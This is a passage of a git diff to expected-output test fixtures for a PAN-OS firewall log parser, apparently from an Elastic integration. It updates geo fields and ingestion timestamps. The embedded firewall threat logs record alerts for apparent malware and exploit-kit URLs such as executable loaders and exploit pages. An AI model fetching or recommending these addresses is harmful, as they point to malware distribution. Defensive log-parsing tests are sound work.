03:21:53,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -962,26 +962,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1077,7 +1072,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:42:57.367080500Z", + "ingested": "2021-12-14T14:49:54.397833290Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json index 0f69e78be65..36af282422f 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json @@ -8,22 +8,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -126,7 +121,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.078988500Z", + "ingested": "2021-12-14T14:49:56.151570718Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -151,22 +146,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -269,7 +259,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.078997900Z", + "ingested": "2021-12-14T14:49:56.151573439Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -294,22 +284,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -412,7 +397,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079001800Z", + "ingested": "2021-12-14T14:49:56.151573828Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -437,22 +422,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -555,7 +535,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079006500Z", + "ingested": "2021-12-14T14:49:56.151574237Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -580,22 +560,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -698,7 +673,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079012400Z", + "ingested": "2021-12-14T14:49:56.151574613Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -723,22 +698,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -841,7 +811,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079018400Z", + "ingested": "2021-12-14T14:49:56.151575011Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -866,22 +836,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -984,7 +949,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079024200Z", + "ingested": "2021-12-14T14:49:56.151575383Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -1009,22 +974,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1127,7 +1087,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079030200Z", + "ingested": "2021-12-14T14:49:56.151575794Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -1152,22 +1112,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1270,7 +1225,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079036100Z", + "ingested": "2021-12-14T14:49:56.151581749Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -1295,22 +1250,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1413,7 +1363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079042Z", + "ingested": "2021-12-14T14:49:56.151582232Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0\u0026uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1\u0026os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -1438,22 +1388,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1556,7 +1501,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079047800Z", + "ingested": "2021-12-14T14:49:56.151582723Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -1581,22 +1526,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1699,7 +1639,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079053900Z", + "ingested": "2021-12-14T14:49:56.151583347Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -1724,22 +1664,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1842,7 +1777,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079059800Z", + "ingested": "2021-12-14T14:49:56.151583763Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -1867,22 +1802,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1983,7 +1913,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079065600Z", + "ingested": "2021-12-14T14:49:56.151584266Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11\u0026parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -2008,22 +1938,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2126,7 +2051,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079071400Z", + "ingested": "2021-12-14T14:49:56.151584660Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -2151,22 +2076,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2269,7 +2189,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079077300Z", + "ingested": "2021-12-14T14:49:56.151585017Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -2294,22 +2214,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Germany", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2410,7 +2325,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079083200Z", + "ingested": "2021-12-14T14:49:56.151585494Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,\"findmorepill.com/klik/search.php?q=xxx\",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -2435,22 +2350,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2553,7 +2463,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079089Z", + "ingested": "2021-12-14T14:49:56.151585865Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -2578,22 +2488,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2696,7 +2601,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079095Z", + "ingested": "2021-12-14T14:49:56.151586218Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -2721,22 +2626,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2839,7 +2739,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079100900Z", + "ingested": "2021-12-14T14:49:56.151586568Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -2864,22 +2764,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2982,7 +2877,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079106700Z", + "ingested": "2021-12-14T14:49:56.151586931Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -3007,22 +2902,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -3125,7 +3015,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079112600Z", + "ingested": "2021-12-14T14:49:56.151587458Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -3150,22 +3040,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -3268,7 +3153,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079116800Z", + "ingested": "2021-12-14T14:49:56.151587831Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -3293,22 +3178,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ 